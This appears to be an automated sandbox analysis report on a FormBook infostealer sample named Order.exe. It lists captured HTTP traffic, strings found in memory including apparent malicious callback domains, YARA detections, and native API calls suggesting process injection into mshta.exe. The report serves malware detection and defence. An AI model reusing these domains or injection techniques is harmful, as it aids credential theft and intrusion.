                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 06:03:50 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 06:03:53 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 06:03:55 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: Order.exe, 00000000.00000002.1737474491.0000000002A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Order.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: mshta.exe, 00000009.00000002.4144994745.000000000546A000.00000004.10000000.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144297992.0000000003B5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.luxe.guru/
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: Order.exe, 00000000.00000002.1755072561.0000000005324000.00000004.00000020.00020000.00000000.sdmp, Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: mkvfHfXifKJWp.exe, 0000000C.00000002.4145802850.0000000004AB8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tukaari.shop
                  Source: mkvfHfXifKJWp.exe, 0000000C.00000002.4145802850.0000000004AB8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tukaari.shop/h8b0/
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: mshta.exe, 00000009.00000002.4144994745.0000000004324000.00000004.10000000.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144297992.0000000002A14000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2206128704.000000000D164000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat
                  Source: mshta.exe, 00000009.00000002.4143600767.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: mshta.exe, 00000009.00000002.4143600767.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                  Source: mshta.exe, 00000009.00000002.4143600767.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: mshta.exe, 00000009.00000002.4143600767.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                  Source: mshta.exe, 00000009.00000002.4143600767.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: mshta.exe, 00000009.00000002.4143600767.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                  Source: mshta.exe, 00000009.00000003.2085578050.0000000008386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                  Source: mshta.exe, 00000009.00000002.4144994745.000000000578E000.00000004.10000000.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144297992.0000000003E7E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.amitayush.digital/5ab9/?kf-HBx=RKfYqv7dLSd52zuxxJ7U
                  Source: mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: firefox.exe, 0000000D.00000002.2206128704.000000000D164000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.strikingly.com/?utm_source=404&utm_medium=internal&utm_campaign=404_redirect
                  Source: mshta.exe, 00000009.00000002.4144994745.0000000004E22000.00000004.10000000.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144297992.0000000003512000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.tmstore.click/qmcg/?kf-HBx=67IAuCDTBw5QZph7iUnsNNZg0vqYuCAKYaPJ7pOH3jPtJouGJ8FP

                  E-Banking Fraud

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 5.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Order.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4145802850.0000000004A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.1906112434.0000000001D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4144094992.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 5.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 5.2.Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 0000000C.00000002.4145802850.0000000004A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000005.00000002.1906112434.0000000001D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000007.00000002.4144094992.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: Order.exe
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0042C8B3 NtClose,5_2_0042C8B3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982B60 NtClose,LdrInitializeThunk,5_2_01982B60
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01982DF0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01982C70
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019835C0 NtCreateMutant,LdrInitializeThunk,5_2_019835C0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01984340 NtSetContextThread,5_2_01984340
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01984650 NtSuspendThread,5_2_01984650
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982B80 NtQueryInformationFile,5_2_01982B80
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982BA0 NtEnumerateValueKey,5_2_01982BA0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982BF0 NtAllocateVirtualMemory,5_2_01982BF0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982BE0 NtQueryValueKey,5_2_01982BE0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982AB0 NtWaitForSingleObject,5_2_01982AB0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982AD0 NtReadFile,5_2_01982AD0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982AF0 NtWriteFile,5_2_01982AF0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982DB0 NtEnumerateKey,5_2_01982DB0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982DD0 NtDelayExecution,5_2_01982DD0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982D10 NtMapViewOfSection,5_2_01982D10
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982D00 NtSetInformationFile,5_2_01982D00
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982D30 NtUnmapViewOfSection,5_2_01982D30
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982CA0 NtQueryInformationToken,5_2_01982CA0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982CC0 NtQueryVirtualMemory,5_2_01982CC0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982CF0 NtOpenProcess,5_2_01982CF0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982C00 NtQueryInformationProcess,5_2_01982C00
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982C60 NtCreateKey,5_2_01982C60
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982F90 NtProtectVirtualMemory,5_2_01982F90
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982FB0 NtResumeThread,5_2_01982FB0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982FA0 NtQuerySection,5_2_01982FA0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982FE0 NtCreateFile,5_2_01982FE0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982F30 NtCreateSection,5_2_01982F30
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982F60 NtCreateProcessEx,5_2_01982F60
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982E80 NtReadVirtualMemory,5_2_01982E80
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982EA0 NtAdjustPrivilegesToken,5_2_01982EA0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982EE0 NtQueueApcThread,5_2_01982EE0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982E30 NtWriteVirtualMemory,5_2_01982E30
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01983090 NtSetValueKey,5_2_01983090
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01983010 NtOpenDirectoryObject,5_2_01983010
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019839B0 NtGetContextThread,5_2_019839B0
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01983D10 NtOpenProcessToken,5_2_01983D10
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01983D70 NtOpenThread,5_2_01983D70
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03984340 NtSetContextThread,LdrInitializeThunk,9_2_03984340
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03984650 NtSuspendThread,LdrInitializeThunk,9_2_03984650
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_03982BA0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03982BF0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982BE0 NtQueryValueKey,LdrInitializeThunk,9_2_03982BE0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982B60 NtClose,LdrInitializeThunk,9_2_03982B60
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982AD0 NtReadFile,LdrInitializeThunk,9_2_03982AD0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982AF0 NtWriteFile,LdrInitializeThunk,9_2_03982AF0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982FB0 NtResumeThread,LdrInitializeThunk,9_2_03982FB0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982FE0 NtCreateFile,LdrInitializeThunk,9_2_03982FE0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982F30 NtCreateSection,LdrInitializeThunk,9_2_03982F30
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_03982E80
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982EE0 NtQueueApcThread,LdrInitializeThunk,9_2_03982EE0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982DD0 NtDelayExecution,LdrInitializeThunk,9_2_03982DD0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03982DF0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982D10 NtMapViewOfSection,LdrInitializeThunk,9_2_03982D10
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_03982D30
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_03982CA0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_03982C70
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982C60 NtCreateKey,LdrInitializeThunk,9_2_03982C60
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039835C0 NtCreateMutant,LdrInitializeThunk,9_2_039835C0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039839B0 NtGetContextThread,LdrInitializeThunk,9_2_039839B0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982B80 NtQueryInformationFile,9_2_03982B80
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982AB0 NtWaitForSingleObject,9_2_03982AB0
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982F90 NtProtectVirtualMemory,9_2_03982F90
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03982FA0 NtQuerySection,9_2_03982FA0
